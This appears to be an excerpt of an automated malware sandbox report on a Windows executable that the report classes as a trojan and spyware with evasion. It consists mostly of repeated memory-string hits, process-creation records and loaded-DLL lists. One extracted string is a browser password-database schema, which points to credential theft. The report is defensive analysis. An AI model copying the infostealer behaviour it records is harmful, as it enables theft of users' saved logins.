Source: file.exe, 00000000.00000003.2314928754.00000000061DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2315055148.00000000060E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2305917129.0000000005DD4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2313971921.00000000060EC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2309274862.00000000060E2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2315317920.00000000062E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320230640.000000000634F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316607082.00000000061F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2317612187.00000000061F3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2318578471.0000000006210000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319692209.000000000620C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2312617478.00000000062B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320376946.00000000060E2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2321407006.00000000060E5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2317492165.00000000060E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2312253006.00000000060EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2307591941.0000000006184000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2307994855.00000000060EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2313728351.00000000061E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2309739853.00000000060E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2312776457.00000000060F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2315184432.00000000061DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2304110586.0000000005E2E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2307690969.00000000060EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319348649.0000000006204000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2309123837.000000000624D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2315458034.00000000060E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316089762.00000000060E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2322401411.0000000006230000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320782535.000000000621B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320944629.0000000006357000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2308356839.0000000006225000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2311487645.00000000060E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2305754805.0000000005EAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2315719533.00000000062EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2307044308.0000000005F45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2317959649.00000000061F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2321894937.000000000637F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2309046350.0000000006195000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2315831065.00000000060EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319542216.00000000060E2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2318360813.00000000060ED000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2308266818.0000000006182000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2322888595.0000000006233000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2313351751.00000000061D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2305571118.0000000005E3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2312122454.00000000061CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2309459258.0000000006197000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2361637241.000000000131C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2314760376.00000000060E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2314150038.00000000061E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2304110586.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2308077108.000000000619F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2306313214.0000000005E59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319959201.00000000060E2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2322552003.0000000006378000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2318150588.0000000006315000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2308467417.00000000060E2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2317772597.00000000060E2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2311780477.000000000629C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2305571118.0000000005DCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2358893236.000000000131C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2310993952.000000000627A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316733377.00000000060EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316220546.00000000061E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316356356.0000000006301000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2311961876.00000000060F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2313568047.00000000060ED000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2306112645.0000000005EC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2313102476.00000000060EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2308155958.00000000060E2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2306313214.0000000005DDC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2321100369.00000000060E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2306112645.0000000005E49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2307494620.00000000060E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2308864951.00000000060EB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2308670041.0000000006242000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2311340710.00000000061B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320107337.0000000006219000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2315587504.00000000061EB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2428120797.0000000005CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2428120797.0000000005CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefO vs file.exe
Source: file.exe, 00000000.00000002.2467509187.0000000005CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000002.2467509187.0000000005CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefO vs file.exe
Source: file.exe, 00000000.00000003.2309989150.00000000060E5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2321561762.000000000622F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2357892182.0000000005CF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2304110586.0000000005D62000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2315962473.00000000061E2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2312945160.00000000061D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2310863985.00000000061B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2307400844.000000000621F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2358820127.0000000005CD7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefO vs file.exe
Source: file.exe, 00000000.00000003.2322722079.00000000060E5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2306950977.00000000060E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2311178978.00000000060E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2310138817.00000000061B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2312421269.00000000061CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319003422.0000000006207000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2307789578.000000000618C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319235919.00000000060E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2307190535.00000000060E5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2305917129.0000000005D62000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2306551248.0000000005E59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2304270252.0000000005E96000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9992827868852459
Source: file.exe	Static PE information: Section: bfltexda ZLIB complexity 0.9942121174254076

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@24/70@9/6

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000003.2104054846.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103959464.0000000005C64000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

Virustotal: Detection: 51%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1712,i,16499392452807308267,17586683353551675273,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2012,i,16342311137299287003,18054011809701615545,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1712,i,16499392452807308267,17586683353551675273,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2012,i,16342311137299287003,18054011809701615545,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wkscli.dll	Jump to behavior

